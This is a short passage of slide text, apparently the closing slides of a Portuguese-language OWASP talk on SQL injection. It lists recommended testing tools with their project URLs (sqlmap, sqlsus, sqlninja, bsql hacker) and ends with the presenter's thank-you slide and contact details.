  • 16. Ferramentas recomendadas... sqlmap http://sqlmap.sourceforge.net sqlsus http://sqlsus.sourceforge.net sqlninja http://sqlninja.sourceforge.net bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ OWASP 16
  • 17. OBRIGADO! CONTATOS: Ulisses Castro uss.castro@gmail.com http://ulissescastro.wordpress.com http://twitter.com/usscastro OWASP 17